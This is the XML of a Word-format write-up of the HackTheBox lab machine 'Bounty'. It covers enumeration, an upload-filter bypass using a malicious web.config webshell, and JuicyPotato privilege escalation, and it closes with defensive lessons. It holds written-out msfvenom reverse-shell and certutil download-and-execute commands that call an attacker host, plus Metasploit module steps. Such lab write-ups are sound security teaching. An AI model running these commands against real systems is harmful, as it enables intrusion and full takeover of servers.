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color w:val="9FEF00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">BOUNTY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Test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Bounty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Target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10.129.5.50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Server 2008 R2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Difficulty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Easy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IIS 7.5 / ASP.NET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NT AUTHORITY\SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bounty is an Easy-rated Windows machine on HackTheBox running Windows Server 2008 R2 with IIS 7.5 and ASP.NET. The attack unfolds in three phases: web enumeration to discover an upload functionality, exploitation of a bypassable extension filter by uploading a malicious web.config that executes classic ASP code, and finally privilege escalation via SeImpersonatePrivilege with JuicyPotato to obtain SYSTEM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Nmap Scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Nmap scan revealed a single open port: 80, with Microsoft IIS 7.5. Unlike Grandpa, WebDAV is not present — the attack vector is completely different. Wappalyzer confirmed ASP.NET as the running framework — essential information for choosing the correct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nmap -sC -sV 10.129.5.50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Gobuster Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Gobuster with extensions asp, aspx, config, and txt returned three significant results: /aspnet_client (403 Forbidden), /transfer.aspx (200 OK), and /uploadedfiles (301 redirect with 403). The combination of an upload endpoint and a folder called uploadedfiles is immediately suggestive.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gobuster dir -u http://10.129.5.50 -w /usr/share/wordlists/dirb/common.txt -x asp,aspx,config,txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Initial Access — web.config Upload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Transfer.aspx Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Visiting /transfer.aspx reveals a simple upload form. Attempting to upload an .aspx file is blocked with 'Invalid File. Please try again', confirming the existence of an extension filter. However, IIS 7.5 processes web.config files as classic ASP scripts when properly configured — and the filter does not block the .config extension.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious web.config Construction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The payload is a web.config that does two things simultaneously: the XML section configures IIS to process .config files via asp.dll (the classic ASP engine), removing default security restrictions. In the HTML comments — which IIS ignores as markup but executes as ASP script — a complete webshell is embedded that accepts commands via a GET parameter and returns output to the screen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload source: https://github.com/swisskyrepo/PayloadsAllTheThings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload and Webshell Activation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The web.config file is uploaded via transfer.aspx without issues — the filter does not block .config. The correct path to access the uploaded file requires the capital letter: /UploadedFiles/web.config.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Important note: the machine has an automatic cleanup that deletes uploaded files every few minutes, so the web.config needs to be re-uploaded periodically during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Webshell access</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">http://10.129.5.50/UploadedFiles/web.config?cmd=whoami</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Output: bounty\merlin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Reverse Shell — Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The browser-based webshell had issues with URL-encoded backslashes, making Windows paths difficult to use directly. The solution was to use certutil with a Python HTTP server started from the working folder on Kali. The Meterpreter payload was generated with msfvenom and transferred via certutil to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msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.48 LPORT=4444 -f exe -o shell.exe</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">python3 -m http.server 8080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On webshell:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">certutil -urlcache -f http://10.10.15.48:8080/shell.exe C:\Windows\Temp\shell.exe</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\Windows\Temp\shell.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Executing shell.exe from the webshell opened a Meterpreter session as bounty\merlin. The getsystem command failed, but local_exploit_suggester identified several applicable local exploits, including ms16_075_reflection_juicy — a Metasploit implementation of JuicyPotato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Privilege Escalation — SeImpersonatePrivilege</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami /priv showed SeImpersonatePrivilege enabled — exactly as on Grandpa with network service. On Windows Server 2008 R2 this privilege allows impersonating tokens of privileged processes. JuicyPotato (and its Metasploit implementation ms16_075_reflection_juicy) exploits this mechanism by creating a COM process with a privileged CLSID and stealing its SYSTEM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use exploit/windows/local/ms16_075_reflection_juicy</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">set SESSION 1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">set LHOST 10.10.15.48</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">run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getuid</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Server username: NT AUTHORITY\SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Attack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Nmap scan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 80 open, IIS 7.5, ASP.NET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Gobuster enumeration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/transfer.aspx and /uploadedfiles discovered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web.config upload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Extension filter bypassed, webshell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Meterpreter shell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as bounty\merlin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ms16_075_reflection_juicy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Privilege escalation to NT AUTHORITY\SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Technical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10.129.5.50 — Windows Server 2008 R2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Vulnerable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IIS 7.5 with upload form at /transfer.aspx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access vector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Malicious web.config upload with embedded ASP webshell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bypassed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not blocked, .aspx blocked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access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bounty\merlin (IIS service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Privesc vector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SeImpersonatePrivilege + JuicyPotato (ms16_075_reflection_juicy)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access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NT AUTHORITY\SYSTEM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gobuster, msfvenom, msfconsole, certutil, impacket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload filter bypass via server configuration extensions: many developers blacklist obvious extensions like .asp and .aspx, forgetting that files like web.config, .htaccess, or .php.ini can be equally dangerous if interpreted specially by the server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload filters must be whitelists (accept only explicitly permitted content), not blacklists (block explicitly forbidden content).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SeImpersonatePrivilege remains one of the most reliable escalation vectors on unpatched Windows systems: churrasco for 2003, JuicyPotato for 2008/2012/2016, RoguePotato and PrintSpoofer for more recent versions.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2026-05-05T17:55:52.341Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-05T17:55:52.341Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>